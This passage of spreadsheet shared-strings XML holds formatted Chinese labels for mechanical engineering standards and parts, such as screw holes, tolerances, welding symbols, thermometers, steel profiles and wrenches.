      <t>内六角圆柱头螺钉扩孔</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>沉头螺栓锥孔口</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>基准和基准系统几何公差</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>键钢</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>固定键和滑动键的尺寸及间隙</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>止动螺钉用粗镗孔</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>中心孔</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>倒角</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>在固定端的螺栓锁紧</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>锁紧力矩</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>收缩配合</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扳手，螺帽，螺栓的</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>S</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>尺寸公差</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扳手钳子尺寸</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>静态机械零件的四方</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>手动拧紧工具的连接四方</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>工具用四方</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>表面粗糙度</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>表示</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>表面粗糙度</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>值</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>焊接接头的说明</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>焊缝符号的名称</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>斜焊接接头的符号名称</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>焊接质量规范介绍</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>焊接槽的接边加工介绍</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管装置仪器的符号表征</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>符号和缩写，摘要</t>
    </r>
  </si>
  <si>
    <r>
      <t>G</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管的并行螺纹，标称尺寸</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺帽的拧紧和拆除说明</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>没有个别公差表示的线性和角度尺寸公差</t>
    </r>
  </si>
  <si>
    <r>
      <t>MD</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>（</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>SI</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>）单位系统</t>
    </r>
  </si>
  <si>
    <r>
      <t>SI</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>单位，转换因素</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扁形，方形，六角头扳手适用的尺寸</t>
    </r>
  </si>
  <si>
    <r>
      <t>WG</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>公差</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> DIN11</t>
    </r>
  </si>
  <si>
    <r>
      <t>WG</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>公差</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> BS</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>表</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> 4</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>和</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>5</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">WFG </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺纹公差（中等）</t>
    </r>
  </si>
  <si>
    <r>
      <t>WFG</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>公差（特殊）</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扳手钳子公差（基于英寸）</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>密封环座尺寸</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>英尺和英寸转换到毫米的转换表</t>
    </r>
  </si>
  <si>
    <r>
      <t>DIP</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>和</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>HEB</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>型的标准尺寸比较</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>固定端的螺栓紧固</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>惠氏螺纹，标准尺寸</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>惠氏细牙螺纹，摘要</t>
    </r>
  </si>
  <si>
    <r>
      <t>ISO-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>公制粗牙螺纹，公差，级别</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>6g</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管子弯半径</t>
    </r>
  </si>
  <si>
    <r>
      <t>ISA</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>公差和旧的</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>B&amp;W</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>公差</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管装置基本符号</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>护套填料材料</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>护套填料，环</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴上的护套环用的环形槽</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>孔里的护套环用的环形槽</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>多芯电缆，数据</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电缆束，不锈钢</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>锁定块，轻负荷</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>锁定块，重负荷</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>钢铆钉</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电镀六角头螺钉</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>内六角平端紧定螺钉</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>胶合密封圈</t>
    </r>
  </si>
  <si>
    <r>
      <t>RHS</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>矩形钢管</t>
    </r>
  </si>
  <si>
    <r>
      <t>RHS</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>方形钢管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>佩恩锁定螺母总成</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管帽（带船检证书）</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管帽</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>温度计用座和排气管测试阀用座</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>插座</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>堵头螺钉</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>六角头螺塞</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>盲端堵头螺钉</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>充液式温度计</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>直角充液式温度计</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>盘式充氮温度计</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>双金属温度计</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>热电偶温度计，</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>PT100</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>温度传感器，</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>4-20mA</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>热电偶温度计，</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>NiCr-Ni</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带钢</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>不锈带钢</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>不锈圆钢</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>不锈方钢</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扁钢和板边</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>波纹板</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>氧炔切割用钢板</t>
    </r>
  </si>
  <si>
    <r>
      <t>I</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>型钢（</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>HEB</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>）</t>
    </r>
  </si>
  <si>
    <r>
      <t>I</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>型钢（</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>IPE</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>）</t>
    </r>
  </si>
  <si>
    <r>
      <t>U</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>型钢</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>不等边热轧角型钢</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>热轧</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>I</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>型钢</t>
    </r>
  </si>
  <si>
    <r>
      <t>RHS</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>不锈钢管</t>
    </r>
  </si>
  <si>
    <r>
      <t>RHS</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>不锈矩形钢管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>不锈金属丝网</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>外四方传动的</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>T</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>形柄</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>可逆棘轮把手</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>加长杆</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>六角传动套筒扳手</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>双六角四方传动套筒扳手</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>四方传动万向节</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>内六角固定螺丝用键</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>锻造弯螺丝吊扣</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴用护环钳</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>孔用护环钳</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>双头开口扳手</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>敲击开口扳手</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>环式敲击扳手</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>单头环形扳手</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>内六角固定螺丝用键工具箱</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>六角键和工具箱</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>六角键表</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>工具箱布置</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>平台加筋</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>弹簧销</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>不带法兰的蝶阀</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
